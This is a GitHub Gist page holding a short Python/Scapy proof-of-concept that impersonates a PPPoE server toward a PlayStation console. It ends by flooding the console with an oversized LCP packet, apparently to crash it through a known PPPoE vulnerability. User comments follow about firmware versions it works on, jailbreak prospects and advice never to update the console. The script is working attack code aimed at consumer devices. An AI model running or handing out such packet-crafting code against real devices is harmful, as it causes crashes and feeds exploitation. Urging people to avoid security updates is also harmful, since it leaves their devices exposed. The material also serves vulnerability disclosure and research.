-
-
Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
| from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
| source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
| destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
| interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
| payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) | |
| packet = sniff(iface=interface, filter="pppoes", count=1) | |
| payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" | |
| packet = srp1(Ether(payload), iface=interface) | |
| print(hexdump(packet)) | |
| payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess | |
| for i in range(20): | |
| sendp(payload, iface=interface) |
cable needs straight or reverse?
cable needs straight or reverse?
PS4/5 can do Auto MDI-X, so it doesn't matter.
proof of concept.
Will 11.02 be available?
Will 11.02 be available?
no, this bug has been patched on 11.02
I've made a video showing how to set this up from scratch if anyone is interested.
If anyone is curious, working on PS5 7.61
零零零零
I tried it on PS3 and it freezes (sometime) on boot screen.
Received 2 packets, got 1 answers, remaining 0 packets
works only after setting up PPPoE for the first time or after changing username/password there. but yeah just tested with 11.00 and it does work
We have more info in Hacker One about this vuln, https://hackerone.com/reports/2177925 . Thanks to TheFl0w
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
Ok I Will Wait _ I am not gonna Update my Console ever
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?
I was asking @unaigonzalezz because there are two different 8.20 FW versions.
There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.
My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?
You still on the scope for a future jailbreak, wait for a exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?
I was asking @unaigonzalezz because there are two different 8.20 FW versions.
There is 8.20.00 and there is 8.20.02 like yours. Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.
Sorry that I didn't know more about jailbreaking stuff, in the past, I used 9.00 for my PS4 Slim version and after a long long time I got one more chance to use Jailbreak, and hopefully TheFlow says 8.20 which includes all the versions
I actually don't know but I if it is .02 it's a small change so I don't think is the error patch, but I'm not truly sure, so the best thing you can guys do is test this script, if it crashes your console, the future exploit should work too.
bro its a poc meaning piece of concept no full jailbreak you have to wait!